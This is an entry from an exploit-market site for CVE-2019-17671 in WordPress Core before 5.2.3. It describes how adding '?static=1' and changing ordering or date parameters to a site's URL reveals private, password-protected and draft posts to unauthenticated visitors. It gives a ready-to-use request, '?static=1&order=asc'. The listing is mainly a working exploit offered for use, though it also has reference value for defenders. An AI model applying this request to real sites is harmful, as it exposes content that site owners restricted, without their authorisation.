[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Core 5.2.3 - Viewing Unauthenticated/Password/Private Posts Vulnerability

Author
Sebastian Neef
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-33546
Category
web applications
Date add
20-11-2019
CVE
CVE-2019-17671
Platform
multiple
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts

So far we know that adding `?static=1` to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format


In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:

#  0day.today [2024-11-15]  #